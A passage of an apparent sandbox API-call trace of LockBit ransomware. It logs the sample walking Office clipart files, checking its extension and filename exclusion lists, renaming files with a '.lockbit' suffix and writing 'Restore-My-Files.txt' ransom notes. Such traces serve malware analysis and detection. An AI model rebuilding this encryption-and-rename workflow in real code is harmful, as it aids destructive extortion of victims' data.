lpString2=".WMF") returned -1 [0157.008] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0157.008] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0157.008] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0157.008] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297727.WMF.lockbit") returned 72 [0157.008] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297727.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297727.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0157.009] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.009] malloc (_Size=0x40068) returned 0x3df0008 [0157.009] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=15516) returned 1 [0157.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.010] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0157.010] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.010] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0157.010] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0157.015] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297727.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297727.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.015] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.016] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0157.016] free (_Block=0x1fa2ed8) [0157.016] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297727.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.016] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.016] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.017] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6613c7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x493e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0297757.WMF", cAlternateFileName="")) returned 1 [0157.017] lstrcmpiW (lpString1=".", lpString2="J0297757.WMF") returned -1 [0157.017] lstrcmpiW (lpString1="..", lpString2="J0297757.WMF") returned -1 [0157.017] PathFindExtensionW (pszPath="J0297757.WMF") returned=".WMF" [0157.017] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0157.017] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0157.018] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0157.018] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.019] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0157.019] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0157.019] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0157.019] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0157.019] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0297757.WMF") returned 1 [0157.019] lstrcmpiW (lpString1="ntldr", lpString2="J0297757.WMF") returned 1 [0157.019] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0297757.WMF") returned 1 [0157.019] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0297757.WMF") returned -1 [0157.019] lstrcmpiW (lpString1="autorun.inf", lpString2="J0297757.WMF") returned -1 [0157.019] lstrcmpiW (lpString1="thumbs.db", lpString2="J0297757.WMF") returned 1 [0157.019] lstrcmpiW (lpString1="iconcache.db", lpString2="J0297757.WMF") returned -1 [0157.019] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.019] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297757.WMF") returned=".WMF" [0157.019] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0157.019] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0157.019] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0157.019] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0157.019] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0157.019] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0157.019] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0157.019] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0157.019] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0157.019] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0157.020] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0157.020] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0157.020] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0157.020] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0157.020] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0157.020] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0157.020] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0157.020] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0157.020] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0157.020] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0157.073] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0157.073] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0157.073] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0157.073] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0157.073] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0157.073] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0157.073] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0157.073] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0157.073] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297757.WMF.lockbit") returned 72 [0157.073] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297757.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297757.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0157.224] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.224] malloc (_Size=0x40068) returned 0x3df0008 [0157.224] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=18750) returned 1 [0157.224] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0157.225] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.226] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0157.226] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0157.232] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297757.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297757.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.232] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.234] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0157.234] free (_Block=0x1fa2ed8) [0157.234] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297757.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.234] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.234] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.234] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6613c7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4960, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0297759.WMF", cAlternateFileName="")) returned 1 [0157.234] lstrcmpiW (lpString1=".", lpString2="J0297759.WMF") returned -1 [0157.234] lstrcmpiW (lpString1="..", lpString2="J0297759.WMF") returned -1 [0157.234] PathFindExtensionW (pszPath="J0297759.WMF") returned=".WMF" [0157.234] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0157.235] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0157.236] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.236] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0157.237] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0157.237] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0157.237] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0157.237] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0297759.WMF") returned 1 [0157.237] lstrcmpiW (lpString1="ntldr", lpString2="J0297759.WMF") returned 1 [0157.237] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0297759.WMF") returned 1 [0157.237] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0297759.WMF") returned -1 [0157.237] lstrcmpiW (lpString1="autorun.inf", lpString2="J0297759.WMF") returned -1 [0157.237] lstrcmpiW (lpString1="thumbs.db", lpString2="J0297759.WMF") returned 1 [0157.237] lstrcmpiW (lpString1="iconcache.db", lpString2="J0297759.WMF") returned -1 [0157.237] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.237] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297759.WMF") returned=".WMF" [0157.237] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0157.237] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0157.237] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0157.237] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0157.237] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0157.237] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0157.237] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0157.237] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0157.237] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0157.237] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0157.238] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0157.238] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297759.WMF.lockbit") returned 72 [0157.238] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297759.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297759.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0157.240] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.240] malloc (_Size=0x40068) returned 0x3df0008 [0157.240] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=18784) returned 1 [0157.240] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.240] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0157.241] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.241] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0157.241] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.246] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297759.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297759.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.246] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.246] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0157.264] free (_Block=0x1fa2ed8) [0157.264] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297759.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.264] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.265] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.265] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x566ffef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4584, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0300862.WMF", cAlternateFileName="")) returned 1 [0157.265] lstrcmpiW (lpString1=".", lpString2="J0300862.WMF") returned -1 [0157.265] lstrcmpiW (lpString1="..", lpString2="J0300862.WMF") returned -1 [0157.265] PathFindExtensionW (pszPath="J0300862.WMF") returned=".WMF" [0157.265] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0157.265] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0157.265] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0157.265] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0157.265] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0157.265] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0157.265] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0157.265] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0157.265] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0157.265] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0157.265] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0157.265] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0157.265] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0157.265] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0157.265] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0157.265] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0157.265] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0157.266] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0157.266] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0157.266] 